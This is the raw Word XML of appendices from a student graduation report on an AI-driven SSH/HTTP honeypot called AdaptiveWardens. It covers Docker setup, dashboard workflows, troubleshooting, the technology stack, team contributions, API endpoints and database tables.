        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Clone the repository and configure the .env file.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">docker compose up -d --build</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">to build and start all services.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Verify all containers show</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“healthy”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">status.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Access the dashboard at</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http://localhost:3000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Compact"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1022"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Test SSH connectivity:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh root@localhost -p 2222</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="76"/>
    <w:bookmarkStart w:id="77" w:name="a.4-user-workflows"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.4 User Workflows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Monitoring Active Sessions:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Open the dashboard at http://localhost:3000</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. The</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“Live Sessions”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">table displays all active attacker connections.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Click any session ID to view detailed command history.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4. Use the search bar to filter sessions by IP, country, or session ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Viewing MITRE ATT&amp;CK Analysis:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to the MITRE ATT&amp;CK section on the dashboard.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. Technique cards display detected attacker behaviors by tactic.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Click any technique ID to open the official MITRE ATT&amp;CK page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Exporting Reports:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1. Navigate to the Reports section.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2. View all sessions with enriched data.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3. Click download for JSON/CSV export or printer for printable report.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="77"/>
    <w:bookmarkStart w:id="78" w:name="a.5-troubleshooting"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.5 Troubleshooting</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Dashboard shows API error</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Restart dashboard-backend:</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
              </w:rPr>
              <w:t xml:space="preserve">docker compose restart dashboard-backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH connection refused</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Check ssh-frontend is running and port 2222 is free</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Generic AI responses</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Verify DEEPSEEK_API_KEY in .env</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">High memory usage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Reduce concurrent session limits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="a.6-stopping-the-system"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">A.6 Stopping the System</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stop all services (preserves data)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose down</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Stop and remove all data</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
        </w:rPr>
        <w:t xml:space="preserve">docker</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> compose down </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
        </w:rPr>
        <w:t xml:space="preserve">-v</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkStart w:id="85" w:name="X8e019acf1017ab7b0f55f873cf98db9ba7f5d4d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Appendix B: Tools, Frameworks, and Additional Information</w:t>
      </w:r>
    </w:p>
    <w:bookmarkStart w:id="81" w:name="b.1-complete-technology-stack"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.1 Complete Technology Stack</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Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Technology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Purpose</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Python 3.11, FastAPI, AsyncSSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Core development and APIs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI/ML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HuggingFace Transformers, spaCy, DeepSeek API</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI inference and NER</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Next.js 16, React 19, TypeScript, TailwindCSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Recharts, D3-geo, Lucide Icons</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Visualization</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">DevOps</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Docker, Docker Compose, GitHub</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Deployment and version control</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Database</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SQLite 3.x</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Persistent storage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="b.2-team-member-contributions"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.2 Team Member Contributions</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1473"/>
        <w:gridCol w:w="736"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="3315"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Member</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Primary Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Key Contributions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ali Ahmed Reda</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202201006</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Engine &amp; IOC Extraction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Model integration, prompt engineering, IOC pipeline, MITRE mapping</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ali Nazeer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202100732</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Frontends &amp; Dashboard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">SSH/HTTP servers, dashboard frontend/backend, WebSocket, heatmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Ahmed Yasser</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202201883</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sandbox State Store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Database schema, filesystem API, process/log management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Abdulkhaliq Sarwat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">202202084</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">HTTP Frontend &amp; Integration</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Request parsing, scanner detection, Docker orchestration, testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="82"/>
    <w:bookmarkStart w:id="83" w:name="b.3-api-endpoints-summary"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.3 API Endpoints Summary</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:type="pct" w:w="5000"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0" w:val="0020"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2160"/>
        <w:gridCol w:w="3360"/>
        <w:gridCol w:w="2400"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="on"/>
        </w:trPr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Key Endpoints</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Base URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Sandbox Store</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">POST/GET /sessions/, POST /commands/, POST /iocs/, POST /attack-techniques/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">:8001</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">AI Engine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">POST /generate-response, POST /analyze</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">:8002</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Backend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">GET /api/sessions, /api/analytics, /api/geo-heatmap, /api/reports</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">:8003</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Dashboard Frontend</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Web UI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr/>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="Compact"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">:3000</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:bookmarkEnd w:id="83"/>
    <w:bookmarkStart w:id="84" w:name="b.4-database-schema"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">B.4 Database Schema</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Tables: sessions, command_history, filesystem, processes, iocs, attack_techniques, system_logs</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AdaptiveWardens: AI-Driven Adaptive Honeypot</dc:title>
  <dc:creator>Team #1</dc:creator>
  <cp:keywords/>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-06-13T18:41:11Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-13T18:41:11Z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Academic Year: 2025–2026</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="fontsize">
    <vt:lpwstr>12pt</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="geometry">
    <vt:lpwstr>left=2.5cm,right=2.5cm,top=2.5cm,bottom=2.5cm</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="mainfont">
    <vt:lpwstr>Times New Roman</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="subtitle">
    <vt:lpwstr>Graduation Project – Final Report</vt:lpwstr>
  </property>
</Properties>
</file>